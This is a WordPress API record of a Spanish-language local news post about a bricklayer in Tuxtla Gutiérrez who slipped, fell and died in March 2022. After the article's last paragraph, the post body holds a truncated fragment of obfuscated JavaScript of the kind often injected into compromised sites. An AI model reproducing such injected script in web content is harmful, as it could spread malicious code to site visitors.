{"id":886,"date":"2022-03-29T01:41:44","date_gmt":"2022-03-29T01:41:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=886"},"modified":"2022-03-29T01:41:45","modified_gmt":"2022-03-29T01:41:45","slug":"fallece-albanil-al-caer-de-su-propia-altura","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=886","title":{"rendered":"Fallece alba\u00f1il al caer de su propia altura"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1648518047787-1024x576.jpg\" alt=\"\" class=\"wp-image-887\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1648518047787-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1648518047787-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1648518047787-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1648518047787.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de oficio alba\u00f1il perdi\u00f3 la vida luego de caer de su propia altura cuando caminaba en la Calle Flamboyant y Avenida Santa Teresa de la Colonia Santa Cruz.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este tr\u00e1gico hecho cerca de las 15: 20 horas de este lunes cuando Gonzalo P\u00e9rez Molina de 58 a\u00f1os de edad sal\u00eda de su trabajo e iba jalando un triciclo.<\/p>\n\n\n\n<p>De manera repentina, resbal\u00f3 y cay\u00f3 de su propia altura y qued\u00f3 inm\u00f3vil.<\/p>\n\n\n\n<p>Su esposa de nombre Angelina llam\u00f3 a los n\u00fameros de emergencias, y al arribo de los param\u00e9dicos de la CRM realizaron una revisi\u00f3n y dictaminaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>Al lugar del deceso arribaron los peritos de la FGE para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un hombre de oficio alba\u00f1il perdi\u00f3 la vida luego de caer de su propia altura cuando caminaba en la Calle Flamboyant y Avenida Santa Teresa de la Colonia Santa Cruz. De acuerdo con los reportes oficiales, este tr\u00e1gico hecho cerca de las 15: &hellip;<\/p>\n","protected":false},"author":2,"featured_media":887,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-886","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=886"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/886\/revisions"}],"predecessor-version":[{"id":888,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/886\/revisions\/888"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/887"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}